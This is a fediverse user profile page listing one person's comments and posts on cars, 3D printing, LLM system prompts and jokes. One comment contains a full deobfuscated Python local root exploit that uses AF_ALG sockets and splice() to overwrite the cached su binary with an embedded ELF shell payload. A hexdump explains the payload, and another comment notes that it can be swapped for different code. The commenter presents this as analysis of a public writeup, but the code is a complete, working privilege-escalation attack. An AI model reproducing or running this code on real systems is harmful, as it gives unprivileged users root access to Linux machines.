Skip Navigation

lime!

@ lime @feddit.nu

Posts
14
Comments
5088
Joined
2 yr. ago

  • The SEAT Leon mk4 FR PHEV

    Jump

  • maybe i'm the weird one because i bought my car specifically for the unusual drivetrain. ...that and the fascia. it seems to have paid off too; 180000km and still not even any weird noises.

  • It all makes sense

    Jump

  • aren't "metamates" what facebook calls its employees now? if so the dissonance is real

  • What's funny here?

    Jump

  • violet?

  • The SEAT Leon mk4 FR PHEV

    Jump

  • what's the drivetrain? is it a series or parallel hybrid?

    Edit: looks like it's got a 6-speed dsg. not a series hybrid then.

    i don't understand why the series hybrids are dying out. on paper it's a better system. changing nothing else, my 2012 ampera would get like 250km range with today's battery tech and yet the top-trim phev's are barely scratching 100km.

  • Club Pen-gone

    Jump

  • germany.jpeg

  • i said what i said

    Jump

  • i don't know if that's possible

  • The same 732-byte Python script roots every Linux distribution shipped since 2017

    Jump

  • here's my attempt at deobfuscating it:

     python
        
#!/usr/bin/env python3

import os
import zlib
import socket as s


def inject(file, offset, data):
    sock = s.socket(s.AF_ALG, s.SOCK_SEQPACKET)
    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

    sock.setsockopt(s.SOL_ALG, s.SO_DEBUG, bytes.fromhex("0800010000000010" + "0" * 64))
    sock.setsockopt(s.SOL_ALG, s.SO_DONTROUTE, None, optlen=4)
    conn, _ = sock.accept()
 
    conn.sendmsg(
        [b"AAAA" + data],
        [
            (s.SOL_ALG, s.MSG_OOB | s.MSG_PEEK, b"\x00\x00\x00\x00"),
            (s.SOL_ALG, s.MSG_PEEK, b"\x10\x00\x00\x00" + b"\x00" * 16),
            (s.SOL_ALG, s.MSG_DONTROUTE, b"\x08\x00\x00\x00"),
        ],
        s.MSG_MORE,
    )
    r, w = os.pipe()
    os.splice(file, w, offset + 4, offset_src=0)
    os.splice(r, conn.fileno(), offset + 4)
    try:
        conn.recv(8 + offset)
    except:
        pass


binary = os.open("/usr/bin/su", os.O_RDONLY)
offset = 0
payload = zlib.decompress(
    bytes.fromhex(
        "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301"
        "d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b96"
        "75c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
    )
)

while offset < len(payload):
    inject(binary, offset, payload[offset : offset + 4])
    offset += 4

os.system("su")

    as far as i understand the writeup, the weakness is in the splice() function, because it silently crosses an auth boundary. the payload looks like this:

     
        
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............ # ELF x86-64 v1, executable
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..>.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8......... # contains 1 56-bit program header
00000040: 0100 0000 0500 0000 0000 0000 0000 0000  ................ # program header starts
00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....
00000060: 9e00 0000 0000 0000 9e00 0000 0000 0000  ................ # flags r-x
00000070: 0010 0000 0000 0000 31c0 31ff b069 0f05  ........1.1..i.. # program starts
00000080: 488d 3d0f 0000 0031 f66a 3b58 990f 0531  H.=....1.j;X...1
00000090: ff6a 3c58 0f05 2f62 696e 2f73 6800 0000  .j<X../bin/sh...

    it's an ELF header that replaces the one on the cached version of the binary (su in this case).

  • The same 732-byte Python script roots every Linux distribution shipped since 2017

    Jump

  • you'd only need to change the payload part, which is a compiled x86 ELF header.

  • Turn a Great White shark upside down… and it looks unreal

    Jump

  • get rotated idiot

  • Every damn time

    Jump

  • "this is the one thing we didn't want to happen"

  • Is the Darwin kernel, used in macOS and iOS, really open source?

    Jump

  • unless apple is doing something weird, the init system is a program, not part of the kernel.

  • DO NOT talk about the goblins

    Jump

  • configuration is things like temperature, output cutoff, and tool use. those are out-of-band. the system prompt, being in-band, can not be configuration. it's like calling a http request configuration for the response.

  • DO NOT talk about the goblins

    Jump

  • of course. but the larger the context grows the less it affects the output. there is some ways around this, like moving the system prompt last in the context before every answer, but the very existence of the system prompt to begin with is a hack. what's really needed is a functional rules-based pre- and post-filtering system for a chatbox to be safe. personally i think the chatbox "style" has played out its role and is living on as a gimmick. actual tooling built with language models is stuff like LSP servers and accessibility software, and that needs rigid configuration.

  • DO NOT talk about the goblins

    Jump

  • because the system prompt is not configuration, it's input. it has the same priority as whatever the user types in, and it takes up valuable space in the context window.

    to add onto what pennomi is saying, this also shows that openai doesn't understand language models. the only actual functionality the llm has is still "given the previous text, what is the most likely character/phoneme/token?", so rather than (to use an analogy) change the font in their word document they add in a sentence in the middle of the document that says "everything from here is in comic sans".

    but it's not surprising that they'd do this. if we've learned anything from the claude frontend leak earlier, where their "sentiment analysis" tool for input text was a regex (you literally have a language model! that's like the only thing it's good at!), i think it's pretty clear most of the big players in the llm space have gotten high on their own supply and can't be expected to actually reason about the operations the system is actually performing.

  • Me_irl

    Jump

  • just start being honest. go long. describe your latest bowel movement in detail. they'll stop asking eventually.

  • The perfect Bond villain owns the James Bond franchise

    Jump

  • love duke nukem

    Jump

  • holy shit it's marcus gearsowar!

  • can somebody help me figure out what the hell is going on with my petg prints?

    Jump

  • kinda, yeah. i halved the print speeds and lowered the fan to 40%, which makes petg come out beautifully given that the support material cooperates. support interface ironing is crucial, as is lowering the interface z distance to basically as low as it can go. if the support interface area is less than like 5mm² it's basically a coin toss as to whether it sticks or not. the extruder can even drag small parts loose on retraction, if your temps are too low. it took finding a detail hanging from the wiping brush for me to figure that one out.

    also, if you're experimenting and still getting spaghetti, one thing to look out for is that there is currently a bug with some of the tree support generation in orca. whenever the slicer generates a big combined tree, check the preview carefully because chances are the supports start in mid-air, 10-20 layers above the plate. there is a setting called "base pattern" that's supposed to work around that but i haven't gotten it to work.

  • Oopsy daisy

    Jump

  • getting a botjob at a croncert

  • 3DPrinting @lemmy.world
    lime! @feddit.nu

    can somebody help me figure out what the hell is going on with my petg prints?

  • Voyager @lemmy.world
    lime! @feddit.nu

    the latest update has a big gap below the bottom menu

  • 3DPrinting @lemmy.world
    lime! @feddit.nu

    how do i fix top surface bulging in orcaslicer?

  • Casual Conversation @piefed.social
    lime! @feddit.nu

    i just realised i might have an instinctive need to "yes, and".

  • Selfhosted @lemmy.world
    lime! @feddit.nu

    What's the security situation when opening a jellyfin server up for casting?

  • Feddit.nu @feddit.nu
    lime! @feddit.nu

    Angående bilder på lemmy

  • Lemmy Shitpost @lemmy.world
    lime! @feddit.nu

    asked and answered

  • Casual Conversation @piefed.social
    lime! @feddit.nu

    got laid off

  • Ask Lemmy @lemmy.world
    lime! @feddit.nu

    what's your ringtone?

  • Asklemmy @lemmy.ml
    lime! @feddit.nu

    what's your ringtone?

  • Buy European @feddit.uk
    lime! @feddit.nu

    Playing card sleeves?

  • Map Enthusiasts @sopuli.xyz
    lime! @feddit.nu

    Original name of the Sony Walkman

  • Citybuilders @sh.itjust.works
    lime! @feddit.nu

    I want a citybuilder with less building.

  • KDE @lemmy.kde.social
    lime! @feddit.nu

    Any ideas? My desktop always ends up like this on login, i don't even know where to begin to fix.